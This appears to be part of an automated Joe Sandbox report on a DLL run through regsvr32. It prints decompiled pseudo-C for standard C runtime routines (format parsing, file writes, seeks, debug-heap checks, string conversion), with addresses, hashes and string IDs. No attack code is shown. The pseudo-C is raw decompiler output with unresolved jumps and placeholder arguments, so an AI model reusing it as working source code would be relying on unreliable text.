                                                  			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                  				void* _t114;
                                                  				char* _t134;
                                                  
                                                  				_a116 = 0;
                                                  				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                  				_t134 =  &_a1112;
                                                  				_a116 = E000007FE7FEF9D31E40(_t134);
                                                  				if (_a116 >= 0) goto 0xf9d3be14;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3be2d;
                                                  				_a116 = _t114 + _t134 - 0x30;
                                                  				_a972 = _a696 & 0x000000ff;
                                                  				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                  				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                  				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                  				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                  				goto 0xf9d3bfd9;
                                                  				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                  				_a1096 = _a1096 + 1;
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3beb2;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xf");
                                                  				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                  				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                  				_a1096 = _a1096 + 2;
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3bfbe;
                                                  				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                  				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                  				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                  				goto 0xf9d3bfbe;
                                                  				_a704 = 0;
                                                  				goto E000007FE7FEF9D3BB66;
                                                  				goto 0xf9d3bfd9;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3bfd9;
                                                  				asm("bts eax, 0xb");
                                                  				_a976 = _a696;
                                                  				_a976 = _a976 - 0x41;
                                                  				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                  				goto __rax;
                                                  			}





                                                  0x7fef9d3bdda
                                                  0x7fef9d3bdf2
                                                  0x7fef9d3bdf4
                                                  0x7fef9d3be01
                                                  0x7fef9d3be0a
                                                  0x7fef9d3be0c
                                                  0x7fef9d3be14
                                                  0x7fef9d3be29
                                                  0x7fef9d3be3a
                                                  0x7fef9d3be49
                                                  0x7fef9d3be53
                                                  0x7fef9d3be61
                                                  0x7fef9d3be6b
                                                  0x7fef9d3be71
                                                  0x7fef9d3be84
                                                  0x7fef9d3be91
                                                  0x7fef9d3be9d
                                                  0x7fef9d3bea5
                                                  0x7fef9d3beae
                                                  0x7fef9d3beb2
                                                  0x7fef9d3bebb
                                                  0x7fef9d3bed1
                                                  0x7fef9d3bee2
                                                  0x7fef9d3bef0
                                                  0x7fef9d3befc
                                                  0x7fef9d3bf04
                                                  0x7fef9d3bf17
                                                  0x7fef9d3bf28
                                                  0x7fef9d3bf36
                                                  0x7fef9d3bf42
                                                  0x7fef9d3bf4a
                                                  0x7fef9d3bf5a
                                                  0x7fef9d3bf6a
                                                  0x7fef9d3bf7a
                                                  0x7fef9d3bf8a
                                                  0x7fef9d3bf9a
                                                  0x7fef9d3bfaa
                                                  0x7fef9d3bfac
                                                  0x7fef9d3bfae
                                                  0x7fef9d3bfb9
                                                  0x7fef9d3bfbe
                                                  0x7fef9d3bfc7
                                                  0x7fef9d3bfcb
                                                  0x7fef9d3bfd1
                                                  0x7fef9d3bfe6
                                                  0x7fef9d3bff7
                                                  0x7fef9d3c006
                                                  0x7fef9d3c02d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-192189897
                                                  • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                  • Instruction ID: 25f4969c447c8d4d660c638a7323c6370fe89c3a0b7b258112d187f79a668fd6
                                                  • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                  • Instruction Fuzzy Hash: ED416E72A0DAC28AE3F0DB24E8547BEB7E4E384345F600126D6DD869A9DB7ED140CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 24%
                                                  			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                  				void* _t114;
                                                  				char* _t134;
                                                  
                                                  				_a116 = 0;
                                                  				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                  				_t134 =  &_a1560;
                                                  				_a116 = E000007FE7FEF9D31E40(_t134);
                                                  				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                  				_a116 = 0xffffffff;
                                                  				goto 0xf9d3dddb;
                                                  				_a116 = _t114 + _t134 - 0x30;
                                                  				_a1408 = _a1208 & 0x0000ffff;
                                                  				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                  				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                  				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                  				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                  				goto 0xf9d3df88;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                  				_a1544 =  &(_a1544[1]);
                                                  				asm("bts eax, 0xc");
                                                  				goto 0xf9d3de61;
                                                  				_a80 = _a80 | 0x00000010;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xf");
                                                  				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("bts eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                  				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                  				_a1544 =  &(_a1544[2]);
                                                  				asm("btr eax, 0xf");
                                                  				goto 0xf9d3df6d;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                  				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                  				goto 0xf9d3df6d;
                                                  				_a1216 = 0;
                                                  				goto E000007FE7FEF9D3DC41;
                                                  				goto 0xf9d3df88;
                                                  				_a80 = _a80 | 0x00000020;
                                                  				goto 0xf9d3df88;
                                                  				asm("bts eax, 0xb");
                                                  				_a1412 = _a1208 & 0x0000ffff;
                                                  				_a1412 = _a1412 - 0x41;
                                                  				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                  				goto __rax;
                                                  			}





                                                  0x7fef9d3dd88
                                                  0x7fef9d3dda0
                                                  0x7fef9d3dda2
                                                  0x7fef9d3ddaf
                                                  0x7fef9d3ddb8
                                                  0x7fef9d3ddba
                                                  0x7fef9d3ddc2
                                                  0x7fef9d3ddd7
                                                  0x7fef9d3dde8
                                                  0x7fef9d3ddf7
                                                  0x7fef9d3de01
                                                  0x7fef9d3de0f
                                                  0x7fef9d3de19
                                                  0x7fef9d3de1f
                                                  0x7fef9d3de32
                                                  0x7fef9d3de40
                                                  0x7fef9d3de4c
                                                  0x7fef9d3de54
                                                  0x7fef9d3de5d
                                                  0x7fef9d3de61
                                                  0x7fef9d3de6a
                                                  0x7fef9d3de80
                                                  0x7fef9d3de91
                                                  0x7fef9d3de9f
                                                  0x7fef9d3deab
                                                  0x7fef9d3deb3
                                                  0x7fef9d3dec6
                                                  0x7fef9d3ded7
                                                  0x7fef9d3dee5
                                                  0x7fef9d3def1
                                                  0x7fef9d3def9
                                                  0x7fef9d3df09
                                                  0x7fef9d3df19
                                                  0x7fef9d3df29
                                                  0x7fef9d3df39
                                                  0x7fef9d3df49
                                                  0x7fef9d3df59
                                                  0x7fef9d3df5b
                                                  0x7fef9d3df5d
                                                  0x7fef9d3df68
                                                  0x7fef9d3df6d
                                                  0x7fef9d3df76
                                                  0x7fef9d3df7a
                                                  0x7fef9d3df80
                                                  0x7fef9d3df95
                                                  0x7fef9d3dfa6
                                                  0x7fef9d3dfb5
                                                  0x7fef9d3dfdc

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-734865713
                                                  • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                  • Instruction ID: 6afb929124b84414141dd4680376ccf7afecd9c4b7d6d92296aea7179b7f5a27
                                                  • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                  • Instruction Fuzzy Hash: 024109A2A0C6C286E7F09B64E8447BEB6E4F394346F600126D6CD876A5DB3ED444DF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                                  • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                  • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                  • API String ID: 275287319-2412454244
                                                  • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                  • Instruction ID: f463794f61061979348d28cf0890255f55ae464b61bc66257c006d95a81b41bb
                                                  • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                  • Instruction Fuzzy Hash: A8316372A18B85C6D790CB28E88066E77A1F7857A5F604325E6FE47AF9CB3DD441CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_unlock
                                                  • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                  • API String ID: 2816345473-1282596470
                                                  • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                  • Instruction ID: 0c290ab1c852a48438f6a901ce88093280091c3cb9967e086700a94ae8aeefb6
                                                  • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                  • Instruction Fuzzy Hash: 18313371D1D2428AE3A08B68ED4476E77E0F741364F615236A6CD866F4D77EE4488B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _free_nolock$_unlock
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                  • API String ID: 2500497606-1087415141
                                                  • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                  • Instruction ID: 34f18152e293ad813cf8b9b11c4969fef8ff7405ef187e896dde4a1f66726313
                                                  • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                  • Instruction Fuzzy Hash: 4121FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                  • String ID: csm
                                                  • API String ID: 933340387-1018135373
                                                  • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                  • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                                  • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                  • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno_invalid_parameter
                                                  • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                  • API String ID: 4140903211-23161695
                                                  • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                  • Instruction ID: f549bc85806da522572ee7890384280d6aac56d4f037a7782e26525923b50f93
                                                  • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                  • Instruction Fuzzy Hash: A2112A71A29606CAF7D0AB14ED5476E72E1F3507C9FA09125E2CD026E4D77EE504CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno_invalid_parameter
                                                  • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                  • API String ID: 4140903211-3042049227
                                                  • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                  • Instruction ID: 08953b95d21c5f70e3699fefb321eca4419d040150facc41ebc10b04699de718
                                                  • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                  • Instruction Fuzzy Hash: F8115731E0C646DAF7A4AF24EC117AE73D0F780398FA0912692CC026E5DB7EE644CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __doserrno_invalid_parameter
                                                  • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                  • API String ID: 4140903211-1338331675
                                                  • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                  • Instruction ID: 8bdd68c2d8658697f17e3158693f35fff5fb9c26cbdf8bf42c76b87004d789dc
                                                  • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                  • Instruction Fuzzy Hash: F0014CB1A18646C6FB90AB24EC4076D36E0F350358FB04125E28D036F5C7BED544CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer__doserrno_invalid_parameter
                                                  • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                  • API String ID: 1098298932-1795423647
                                                  • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                  • Instruction ID: 5ff663975ae3511ed6d2782a661d896beba523f0d1828ccbc0613956f22d1229
                                                  • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                  • Instruction Fuzzy Hash: CBE03960A0890696F6D4AF14EC113EE2290A740788FE14222908D072F2CB7EA605C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 16%
                                                  			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                  				long long _v24;
                                                  				intOrPtr _v32;
                                                  				long long _v40;
                                                  				signed int _v48;
                                                  				int _v52;
                                                  				int _v56;
                                                  				signed int _v64;
                                                  				long long _v72;
                                                  				long long _t82;
                                                  
                                                  				_a32 = r9d;
                                                  				_a24 = __r8;
                                                  				_a16 = __edx;
                                                  				_a8 = __rcx;
                                                  				_v56 = 0;
                                                  				if (_a48 != 0) goto 0xf9d2f5ab;
                                                  				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                  				if (_a64 == 0) goto 0xf9d2f5bf;
                                                  				_v32 = 9;
                                                  				goto 0xf9d2f5c7;
                                                  				_v32 = 1;
                                                  				_v64 = 0;
                                                  				_v72 = 0;
                                                  				r9d = _a32;
                                                  				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                  				if (_v48 != 0) goto 0xf9d2f60b;
                                                  				goto 0xf9d2f6f8;
                                                  				if (0 != 0) goto 0xf9d2f652;
                                                  				if (_v48 <= 0) goto 0xf9d2f652;
                                                  				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                                  				_t82 = _v48 + _v48 + 0x10;
                                                  				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                                  				_v24 = _t82;
                                                  				goto 0xf9d2f65b;
                                                  				_v24 = 0;
                                                  				_v40 = _v24;
                                                  				if (_v40 != 0) goto 0xf9d2f674;
                                                  				goto 0xf9d2f6f8;
                                                  				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                  				_v64 = _v48;
                                                  				_v72 = _v40;
                                                  				r9d = _a32;
                                                  				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                  				if (_v52 == 0) goto 0xf9d2f6ea;
                                                  				r8d = _v52;
                                                  				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                  				E000007FE7FEF9D2F3E0(_v40);
                                                  				return _v56;
                                                  			}












                                                  0x7fef9d2f570
                                                  0x7fef9d2f575
                                                  0x7fef9d2f57a
                                                  0x7fef9d2f57e
                                                  0x7fef9d2f587
                                                  0x7fef9d2f597
                                                  0x7fef9d2f5a4
                                                  0x7fef9d2f5b3
                                                  0x7fef9d2f5b5
                                                  0x7fef9d2f5bd
                                                  0x7fef9d2f5bf
                                                  0x7fef9d2f5c7
                                                  0x7fef9d2f5cf
                                                  0x7fef9d2f5d8
                                                  0x7fef9d2f5f9
                                                  0x7fef9d2f602
                                                  0x7fef9d2f606
                                                  0x7fef9d2f60f
                                                  0x7fef9d2f616
                                                  0x7fef9d2f62a
                                                  0x7fef9d2f631
                                                  0x7fef9d2f646
                                                  0x7fef9d2f64b
                                                  0x7fef9d2f650
                                                  0x7fef9d2f652
                                                  0x7fef9d2f660
                                                  0x7fef9d2f66b
                                                  0x7fef9d2f66f
                                                  0x7fef9d2f686
                                                  0x7fef9d2f68f
                                                  0x7fef9d2f698
                                                  0x7fef9d2f69d
                                                  0x7fef9d2f6bf
                                                  0x7fef9d2f6c8
                                                  0x7fef9d2f6d2
                                                  0x7fef9d2f6e6
                                                  0x7fef9d2f6ef
                                                  0x7fef9d2f6fc

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                  • String ID:
                                                  • API String ID: 2618398691-0
                                                  • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                  • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                                  • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                  • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 20%
                                                  			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  
                                                  				_a8 = __ecx;
                                                  				_v24 = 0;
                                                  				_v16 = 0;
